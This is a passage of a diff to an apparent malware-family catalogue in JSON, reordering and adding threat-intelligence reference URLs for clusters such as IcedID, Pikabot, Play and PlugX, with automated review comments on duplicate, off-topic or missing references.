- "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/"
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/",
+ "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/",
+ "https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/",
+ "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows"
],
"synonyms": [
"Trik"
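Review bot: `https://bin.re/blog/phorpiex/` is the only new entry in this block; it carries the same slug as the existing `https://www.johannesbader.ch/2016/02/phorpiex/`, so check whether both point at the same article before keeping both. The block also lists the McAfee sandbox-evasion post twice (`www.mcafee.com/blogs/other-blogs/mcafee-labs/...` and `securingtomorrow.mcafee.com/other-blogs/mcafee-labs/...`), and a reorder commit is a good moment to drop one of them.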
@@ -35652,18 +37515,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader",
- "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/",
- "https://twitter.com/felixw3000/status/1521816045769662468",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure",
- "https://isc.sans.edu/diary/28636",
- "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
- "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
"https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
+ "https://isc.sans.edu/diary/29740",
+ "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary",
+ "https://www.team-cymru.com/post/from-chile-with-malware",
+ "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/",
+ "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://research.openanalysis.net/icedid/bokbot/photoloader/config/2023/04/06/photoloader.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
+ "https://twitter.com/felixw3000/status/1521816045769662468",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/",
+ "https://blog.talosintelligence.com/following-the-lnk-metadata-trail",
+ "https://www.youtube.com/watch?v=4j8t9kFLFIY",
+ "https://isc.sans.edu/diary/28636",
+ "https://www.elastic.co/security-labs/unpacking-icedid",
+ "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
+ "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing",
+ "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1",
+ "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes",
+ "https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns",
"https://sysopfb.github.io/malware,/icedid/2020/04/28/IcedIDs-updated-photoloader.html",
- "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure"
],
"synonyms": [],
"type": []
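Review bot: two of the thirteen refs added here are audio/video with no text fallback (`https://www.youtube.com/watch?v=4j8t9kFLFIY` and `https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1`); a pointer to a written summary, or at least a note of what they cover, would help analysts decide whether opening them is worthwhile. The added Microsoft post (`raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity`) is titled around a different family, so it is worth confirming that it discusses IcedID/PhotoLoader directly before it counts as a reference for this cluster.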
@@ -35699,14 +37575,28 @@
"uuid": "2bda00e8-e6a7-448d-8dfa-4f2276230e8b",
"value": "Pierogi"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot",
+ "https://minerva-labs.com/blog/beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware/",
+ "https://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "992151e9-2d4d-4621-9a2e-f2219f97e55b",
+ "value": "Pikabot"
+ },
{
"description": "According to FireEye, PILLOWMINT is a Point-of-Sale malware tool used to scrape track 1 and track 2 payment card data from memory.\r\n Scraped payment card data is encrypted and stored in the registry and as plaintext in a file (T1074: Data Staged)\r\n Contains additional backdoor capabilities including:\r\n Running processes\r\n Downloading and executing files (T1105: Remote File Copy)\r\n Downloading and injecting DLLs (T1055: Process Injection)\r\n Communicates with a command and control (C2) server over HTTP using AES encrypted messages\r\n (T1071: Standard Application Layer Protocol)\r\n (T1032: Standard Cryptographic Protocol)\r\n\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint",
"https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf"
],
"synonyms": [],
"type": []
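Review bot: the new `Pikabot` cluster has an empty `"description"` even though both non-Malpedia refs have descriptive titles (`beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware`, `shortandmalicious-pikabot-and-the-matanbuchus-connection`); a one-sentence summary drawn from them would make the entry searchable by keyword. The PILLOWMINT portion of the hunk only swaps the order of the trustwave and fireeye refs.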
@@ -35714,6 +37604,19 @@
"uuid": "dec78ec5-f02d-461f-a8cc-cd4e80099e38",
"value": "PILLOWMINT"
},
+ {
+ "description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke’s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke",
+ "https://blog.f-secure.com/wp-content/uploads/2020/03/F-Secure_Dukes_Whitepaper.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d837fc8e-1298-4911-9cfd-eb434a25bf3a",
+ "value": "PinchDuke"
+ },
{
"description": "",
"meta": {
@@ -35746,8 +37649,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemon",
- "https://twitter.com/ESETresearch/status/1506904404225630210",
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/"
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
+ "https://twitter.com/ESETresearch/status/1506904404225630210"
],
"synonyms": [],
"type": []
@@ -35755,15 +37658,28 @@
"uuid": "34c0b51a-7139-44ab-b09a-cef646e66ba0",
"value": "PipeMon"
},
+ {
+ "description": "Infostealer",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirate_stealer",
+ "https://mostwanted002.cf/post/malware-analysis-and-triage-report-piratestealer/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "19748031-0d8d-4e76-bf8e-0838f8a3d07c",
+ "value": "PirateStealer"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi",
"https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html",
- "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-mayfair",
+ "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong",
"https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/"
],
"synonyms": [
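Review bot: the new `PirateStealer` description is the single word "Infostealer", which is a category rather than a description; the Malpedia entry should give at least one sentence of what it steals or how it is delivered. Its only other ref is on `mostwanted002.cf`, a free .cf domain that is likely to lapse, so an archived copy of that report should be added alongside it. The pirpi part of the hunk only moves the web.archive.org Symantec link.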
@@ -35772,15 +37688,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "4859330d-c6a5-4b9c-b45b-536ec983cd4a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154",
"value": "pirpi"
},
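Review bot: this hunk deletes the `related` block that linked pirpi to `4859330d-c6a5-4b9c-b45b-536ec983cd4a` with a `"similar"` relationship, and nothing else in the patch re-adds that link. Confirm the removal is intentional (for example, the target cluster was retired) rather than a side effect of the generator dropping `related` arrays it does not manage; the same deletion happens for PLAINTEE further down.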
@@ -35789,11 +37696,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou",
- "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884",
"https://isc.sans.edu/diary/rss/25068",
+ "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf",
+ "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884",
"http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.565.9211&rep=rep1&type=pdf",
- "https://johannesbader.ch/2019/07/the-dga-of-pitou/",
- "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf"
+ "https://johannesbader.ch/2019/07/the-dga-of-pitou/"
],
"synonyms": [],
"type": []
@@ -35838,23 +37745,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee",
- "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
"https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/",
- "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
- "https://unit42.paloaltonetworks.com/atoms/rancortaurus/"
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://unit42.paloaltonetworks.com/atoms/rancortaurus/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "58b24db2-79d7-11e8-9b1b-bbdbc798af4f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876",
"value": "PLAINTEE"
},
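Review bot: the `related` entry pointing at `58b24db2-79d7-11e8-9b1b-bbdbc798af4f` is removed here with no replacement. If these cross-references are now maintained elsewhere, the commit message should say so; otherwise this is a silent loss of a relationship that consumers of the galaxy may rely on. The refs changes in the same hunk are a reorder only.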
@@ -35863,9 +37761,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.play",
+ "https://www.orangecyberdefense.com/global/blog/playing-the-game",
+ "https://chuongdong.com/reverse%20engineering/2022/09/03/PLAYRansomware/",
+ "https://www.bleepingcomputer.com/news/security/rackspace-confirms-play-ransomware-was-behind-recent-cyberattack/",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-play-ransomware",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy",
"https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.avertium.com/resources/threat-reports/an-in-depth-look-at-play-ransomware",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
"https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
- "https://chuongdong.com/reverse%20engineering/2022/09/03/PLAYRansomware/"
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65"
],
"synonyms": [
"PlayCrypt"
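Review bot: the added `noticeofpleadings.com/.../Complaint(907040021.9).pdf` URL contains unencoded parentheses; it is valid inside a JSON string, but some link checkers and Markdown renderers stop at `(`, so percent-encoding them as `%28` and `%29` is safer. Of the other new refs, `march-2023-broke-ransomware-attack-records-with-459-incidents` and `from-royal-with-love` are titled around topics other than Play, so it is worth confirming they discuss Play specifically before they are kept as references for this cluster.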
@@ -35893,29 +37799,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.plead",
- "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html",
- "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf",
- "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
- "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
- "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
- "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "http://www.freebuf.com/column/159865.html",
- "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html",
"https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/",
- "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html",
- "https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html",
- "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
"https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
- "https://securelist.com/apt-trends-report-q2-2019/91897/"
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
+ "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html",
+ "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html",
+ "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html",
+ "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt",
+ "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
+ "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html",
+ "http://www.freebuf.com/column/159865.html",
+ "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/"
],
"synonyms": [
"DRAWDOWN",
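Review bot: this hunk is a pure reorder (the same URLs are removed and re-added), so it adds no information but does keep both the live SANS summit PDF `https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf` and its `web.archive.org/web/20200229012206/...` snapshot as separate refs. Keeping only the archived copy, or marking one as the fallback, would be cleaner than listing both.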
@@ -35932,13 +37838,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm",
+ "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf",
"https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html",
- "https://www.crowdstrike.com/blog/ploutus-atm-malware-deobfuscation-case-study",
- "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
"http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html",
"https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america",
- "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf"
+ "https://www.crowdstrike.com/blog/ploutus-atm-malware-deobfuscation-case-study",
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html"
],
"synonyms": [],
"type": []
@@ -35951,8 +37857,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx",
- "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx",
- "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html"
+ "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html",
+ "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx"
],
"synonyms": [],
"type": []
@@ -35965,155 +37871,175 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx",
- "https://blog.xorhex.com/blog/mustangpandaplugx-1/",
- "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
- "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
- "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/",
- "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html",
- "https://securelist.com/time-of-death-connected-medicine/84315/",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.youtube.com/watch?v=r1zAVX_HnJg",
- "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/",
- "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.youtube.com/watch?v=6SDdUVejR2w",
- "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/",
- "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf",
- "https://unit42.paloaltonetworks.com/thor-plugx-variant/",
- "https://therecord.media/redecho-group-parks-domains-after-public-exposure/",
- "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/",
- "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
- "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/",
- "https://attack.mitre.org/groups/G0096",
- "https://twitter.com/xorhex/status/1399906601562165249?s=20",
- "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html",
- "https://twitter.com/stvemillertime/status/1261263000960450562",
- "https://www.contextis.com/en/blog/dll-search-order-hijacking",
- "https://blog.vincss.net/2022/05/re027-china-based-apt-mustang-panda-might-have-still-continued-their-attack-activities-against-organizations-in-Vietnam.html",
- "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf",
- "https://www.bleepingcomputer.com/news/security/new-mustang-panda-hacking-campaign-targets-diplomats-isps/",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
- "https://www.secureworks.com/research/threat-profiles/bronze-olive",
- "https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution",
- "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
- "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/",
- "https://www.secureworks.com/research/threat-profiles/bronze-woodland",
- "https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers",
- "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf",
- "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
+ "https://asec.ahnlab.com/en/49097/",
+ "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/",
+ "https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware",
"https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/",
- "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf",
- "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
- "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
- "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/",
- "https://www.secureworks.com/research/threat-profiles/bronze-express",
- "https://redalert.nshc.net/2022/04/14/hacking-activity-of-sectorb-group-in-2021/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf",
- "https://www.youtube.com/watch?v=E2_DTQJjDYc",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://tracker.h3x.eu/info/290",
- "https://www.lac.co.jp/lacwatch/people/20171218_001445.html",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
- "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
- "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
- "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/",
- "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-president",
- "https://community.rsa.com/thread/185439",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.contextis.com/en/blog/avivore",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html",
- "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
+ "https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://www.secureworks.com/research/threat-profiles/bronze-union",
"https://www.contextis.com/de/blog/avivore",
- "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/",
- "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
- "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/",
- "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://www.youtube.com/watch?v=qEwBGGgWgOM",
- "https://cyberandramen.net/2022/01/06/a-gulp-of-plugx/",
- "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
- "https://blog.xorhex.com/blog/reddeltaplugxchangeup/",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
- "https://www.secureworks.com/research/bronze-president-targets-ngos",
- "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
- "https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited",
- "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report",
- "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
- "https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf",
- "https://www.recordedfuture.com/china-linked-ta428-threat-group",
- "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/",
- "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html",
- "https://blog.xorhex.com/blog/mustangpandaplugx-2/",
